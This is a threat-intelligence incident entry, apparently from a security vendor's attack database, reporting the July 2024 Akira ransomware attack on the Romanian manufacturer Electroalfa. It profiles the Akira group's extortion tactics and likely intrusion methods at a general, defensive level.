Electroalfa Hit by Akira Ransomware: 10GB Data Stolen

Incident Date: Jul 24, 2024

Attack Overview
VICTIM
Electroalfa
INDUSTRY
Manufacturing
LOCATION
Romania
ATTACKER
Akira
FIRST REPORTED
July 24, 2024

Ransomware Attack on Electroalfa by Akira Group

Overview of Electroalfa

Electroalfa, a prominent Romanian company, operates in the manufacturing sector with a specialization in electrical engineering. The company is divided into three primary business units: Electrical Equipment, Steel Fabricated Parts, and EPC (Engineering, Procurement, and Construction) Contractor services. Electroalfa is known for its commitment to quality and innovation, which has established it as a significant player in the industry. The company employs a substantial workforce and has multiple factories and sales branches, although specific figures are not disclosed.

Details of the Attack

Electroalfa has recently fallen victim to a ransomware attack orchestrated by the Akira ransomware group. The cybercriminals have reportedly exfiltrated 10 GB of sensitive data, including project information, client details, and comprehensive personal information of employees. This breach underscores significant vulnerabilities within Electroalfa's cybersecurity infrastructure, highlighting the critical need for enhanced protective measures.

About the Akira Ransomware Group

Akira is a rapidly growing ransomware family that first emerged in March 2023. The group targets small to medium-sized businesses across various sectors, including manufacturing, government, technology, and more. Akira is believed to be affiliated with the now-defunct Conti ransomware gang, sharing similarities in their code. The group employs double extortion tactics, stealing data before encrypting systems and demanding a ransom for both decryption and data deletion. Their ransom demands typically range from $200,000 to over $4 million.

Distinguishing Features of Akira

Akira's dark web leak site features a retro 1980s-style green-on-black interface, requiring victims to navigate by typing commands. The group uses unauthorized access to VPNs, credential theft, and lateral movement to deploy ransomware. Tools like RClone, FileZilla, and WinSCP are used for data exfiltration. In some cases, Akira has deployed a previously unreported backdoor. As of January 2024, Akira has claimed over 250 victims and $42 million in ransomware proceeds.

Potential Vulnerabilities and Penetration Methods

The Akira ransomware group likely penetrated Electroalfa's systems through unauthorized access to VPNs and credential theft. The company's significant size and extensive operations across multiple sectors may have contributed to its vulnerability. The attack highlights the importance of robust cybersecurity measures, including regular updates, employee training, and advanced threat detection systems.

Sources

Disclaimer

The Halcyon Attacks Lookout Database is compiled using publicly available information based on the hosting choices of real-world threat actors and data from a variety of trackers. This information is provided in accordance with principles of fair use. Halcyon has made reasonable efforts to sanitize and verify the data; however, we do not guarantee the accuracy, completeness, or reliability of the information provided. Updates to the database are made as new source data becomes available from reputable sources.  By accessing, viewing, or using the information within the Halcyon Attacks Lookout Database, you acknowledge and agree to do so entirely at your own risk. No reliance should be placed upon the information for decision-making, and Halcyon disclaims all liability for any inaccuracies or omissions in the data.

See Halcyon in action

Interested in getting a demo?
Fill out the form to meet with a Halcyon Anti-Ransomware Expert!

1
2
3
Let's get started
1
1
2
3
1
1
2
2
3
Back
Next
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.